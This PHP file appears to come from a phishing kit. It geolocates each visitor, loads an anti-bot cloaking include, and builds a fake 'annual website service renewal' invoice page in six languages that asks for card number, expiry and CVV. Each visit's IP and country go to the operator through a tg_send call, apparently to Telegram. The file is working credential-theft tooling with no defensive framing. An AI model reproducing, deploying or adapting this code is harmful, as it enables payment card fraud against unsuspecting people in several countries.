<?php
include 'antibot.php';
include_once("config.php");

$ip = $_SERVER['REMOTE_ADDR'];
$cc = function_exists('geoip_country_code_by_name') ? geoip_country_code_by_name($ip) : 'US';

$langs = [
  'IL' => ['he', 'rtl', '₪', '890.00', [
    'title' => 'תשלום חשבונית',
    'invoice' => 'מספר חשבונית',
    'date' => 'תאריך',
    'amount_due' => 'סכום לתשלום',
    'desc' => 'חידוש שנתי עבור שירותי האתר',
    'provider' => 'ספק שירות',
    'billing_email' => 'דוא"ל לחיוב',
    'download' => 'הורד חשבונית (PDF)',
    'secure' => '🔒 החיבור שלך מאובטח באמצעות הצפנה',
    'submit' => 'שלם עכשיו',
    'card_name' => 'שם בעל הכרטיס',
    'card_number' => 'מספר כרטיס אשראי',
    'expiry' => 'תאריך תפוגה (MM/YY)',
    'cvv' => 'קוד אבטחה (CVV)',
  ]],
  'FR' => ['fr', 'ltr', '€', '265.00', [
    'title' => 'Paiement de facture',
    'invoice' => 'Numéro de facture',
    'date' => 'Date',
    'amount_due' => 'Montant dû',
    'desc' => 'Renouvellement annuel des services Web',
    'provider' => 'Fournisseur',
    'billing_email' => 'Email de facturation',
    'download' => 'Télécharger la facture (PDF)',
    'secure' => '🔒 Votre connexion est sécurisée',
    'submit' => 'Payer maintenant',
    'card_name' => 'Titulaire de la carte',
    'card_number' => 'Numéro de carte',
    'expiry' => 'Expiration (MM/AA)',
    'cvv' => 'Code de sécurité (CVV)',
  ]],
  'PL' => ['pl', 'ltr', 'zł', '340.00', [
    'title' => 'Płatność faktury',
    'invoice' => 'Numer faktury',
    'date' => 'Data',
    'amount_due' => 'Kwota do zapłaty',
    'desc' => 'Roczna opłata za usługi strony internetowej',
    'provider' => 'Dostawca',
    'billing_email' => 'Email do faktur',
    'download' => 'Pobierz fakturę (PDF)',
    'secure' => '🔒 Twoje połączenie jest bezpieczne',
    'submit' => 'Zapłać teraz',
    'card_name' => 'Imię i nazwisko posiadacza karty',
    'card_number' => 'Numer karty',
    'expiry' => 'Data ważności (MM/RR)',
    'cvv' => 'Kod bezpieczeństwa (CVV)',
  ]],
  'DE' => ['de', 'ltr', '€', '399.00', [
    'title' => 'Rechnungszahlung',
    'invoice' => 'Rechnungsnummer',
    'date' => 'Datum',
    'amount_due' => 'Fälliger Betrag',
    'desc' => 'Jährliche Erneuerung der Website-Dienste',
    'provider' => 'Anbieter',
    'billing_email' => 'Rechnungs-E-Mail',
    'download' => 'Rechnung herunterladen (PDF)',
    'secure' => '🔒 Ihre Verbindung ist gesichert',
    'submit' => 'Jetzt bezahlen',
    'card_name' => 'Name des Karteninhabers',
    'card_number' => 'Kartennummer',
    'expiry' => 'Ablaufdatum (MM/JJ)',
    'cvv' => 'Sicherheitscode (CVV)',
  ]],
  'SA' => ['ar', 'rtl', '﷼', '1120.00', [
    'title' => 'دفع الفاتورة',
    'invoice' => 'رقم الفاتورة',
    'date' => 'التاريخ',
    'amount_due' => 'المبلغ المستحق',
    'desc' => 'تجديد سنوي لخدمات الموقع',
    'provider' => 'مزود الخدمة',
    'billing_email' => 'بريد الفوترة',
    'download' => 'تحميل الفاتورة (PDF)',
    'secure' => '🔒 الاتصال بك مؤمن',
    'submit' => 'ادفع الآن',
    'card_name' => 'اسم صاحب البطاقة',
    'card_number' => 'رقم البطاقة',
    'expiry' => 'تاريخ الانتهاء (MM/YY)',
    'cvv' => 'رمز الأمان (CVV)',
  ]],
  'US' => ['en', 'ltr', '$', '299.00', [
    'title' => 'Invoice Payment',
    'invoice' => 'Invoice Number',
    'date' => 'Date',
    'amount_due' => 'Amount Due',
    'desc' => 'Annual website service renewal',
    'provider' => 'Provider',
    'billing_email' => 'Billing Email',
    'download' => 'Download Invoice (PDF)',
    'secure' => '🔒 Your connection is secured',
    'submit' => 'Pay Now',
    'card_name' => 'Cardholder Name',
    'card_number' => 'Card Number',
    'expiry' => 'Expiry Date (MM/YY)',
    'cvv' => 'Security Code (CVV)',
  ]]
];

list($lang, $dir, $currency, $amount, $t) = $langs[$cc] ?? $langs['US'];

tg_send("📥 <b>Visit:</b> x.php\\nIP: $ip\\nCountry: $cc");
